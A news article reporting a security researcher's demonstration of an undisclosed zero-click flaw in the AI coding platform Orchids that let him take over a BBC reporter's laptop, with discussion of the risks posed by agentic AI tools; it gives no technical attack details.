AI Coding Platform Security Flaw Allows BBC Reporter’s Laptop to Be Hijacked
Demonstration of a “Zero-Click” Hack Raises Broader Concerns About Agentic AI Tools With Deep System Access

What Happened
A significant and unresolved cyber-security vulnerability has been identified in Orchids, a rapidly growing AI-powered coding platform, after a demonstration showed how a BBC reporter’s laptop could be compromised without any direct action from the user.
Orchids markets itself as a “vibe-coding” tool — a system that allows people without programming experience to build apps and games by typing natural-language prompts into a chatbot. The AI then generates and manages the underlying code autonomously. The platform claims to have one million users and lists major companies such as Google, Uber, and Amazon among those using its services.
The vulnerability was demonstrated to the BBC by Etizaz Mohsin, a UK-based cyber-security researcher originally from Pakistan. Mohsin discovered the flaw in December 2025 while experimenting with vibe-coding systems.
In a controlled test, BBC cyber correspondent Joe Tidy downloaded the Orchids desktop application onto a spare laptop and initiated a simple project. Using a text prompt, he asked the AI to help generate code for a game inspired by the BBC News website. The AI began automatically compiling thousands of lines of code.
Mohsin, exploiting a security weakness that has not been publicly disclosed, was able to gain access to the reporter’s coding project. Without the reporter’s knowledge, he inserted a small line of malicious code within the project’s existing codebase.
Shortly afterward, a notepad file titled “Joe is hacked” appeared on the laptop’s desktop, and the wallpaper was changed to an image of an AI-themed hacker graphic. The demonstration showed that the researcher could access and manipulate the machine remotely.
According to the report, this type of attack qualifies as a “zero-click” exploit, meaning it required no action — such as downloading a file or entering login credentials — from the victim.
The implications of such access could include installing malware, stealing financial or private data, accessing browsing history, or activating cameras and microphones.
Mohsin said he contacted Orchids multiple times over several weeks via email, LinkedIn, and Discord before receiving a response. The company, founded in 2025 and reportedly employing fewer than 10 people, told him it may have missed earlier warnings due to being “overwhelmed with inbound” messages. The BBC states that repeated requests for comment have not been answered.
Experts warn that the flaw highlights a broader security challenge emerging with AI “agentic” systems — tools designed to autonomously perform complex actions on users’ devices.
Why It Matters
The Orchids vulnerability illustrates a fundamental shift in cybersecurity risk as AI tools move from passive assistants to active system operators.
Traditional software vulnerabilities often require user interaction — clicking a malicious link, downloading a file, or revealing login credentials. Agentic AI platforms change that model. When users grant an AI tool deep system permissions so it can write code, manage files, or execute tasks, they effectively expand the attack surface of their device.
In this case, the very feature that makes vibe-coding appealing — autonomous code generation and execution — appears to have enabled remote access without user awareness.
The broader concern is structural rather than isolated. As AI coding agents gain popularity, they are increasingly trusted with full file-system access, internet connectivity, and execution privileges. If vulnerabilities exist in the communication layers or project management infrastructure of such platforms, attackers may exploit them at scale.
Mohsin described the shift as creating “an entirely new class of security vulnerability.” The risk stems from automation combined with user inexperience. Many vibe-coding users lack the technical background to review generated code. A single malicious line inserted among thousands of AI-produced lines could go unnoticed.
This incident also raises questions about startup maturity in the AI boom. Orchids, like many fast-growing AI companies, reportedly operates with a small team while scaling rapidly. When platforms expand user bases before establishing robust security auditing processes, oversight gaps can emerge.
Cybersecurity specialists have warned that AI agents capable of operating messaging apps, calendars, codebases, or financial tools may inadvertently become high-value targets. Once compromised, they can serve as privileged entry points into corporate or personal systems.
The Orchids case does not necessarily indicate systemic flaws across all vibe-coding platforms. However, it underscores the need for stricter security design, transparent vulnerability response processes, and clearer user guidance about operational risks.
As AI systems become embedded into workflows traditionally handled by trained professionals — including coding, finance, and legal drafting — convenience increasingly competes with caution. The trade-off is subtle: users exchange technical complexity for automation, but also surrender layers of manual oversight.
The rise of agentic AI suggests that cybersecurity frameworks may need to evolve beyond traditional user-based threat models. When AI systems act independently, accountability and monitoring mechanisms must adapt accordingly.
For now, experts recommend isolating experimental AI tools on separate devices, using disposable accounts for testing, and limiting system-level permissions wherever possible.
The Orchids vulnerability serves as an early warning. As AI agents become more capable, the question is no longer whether they can build applications — but whether the systems that empower them are secure enough to protect the people who trust them.



Comments
There are no comments for this story
Be the first to respond and start the conversation.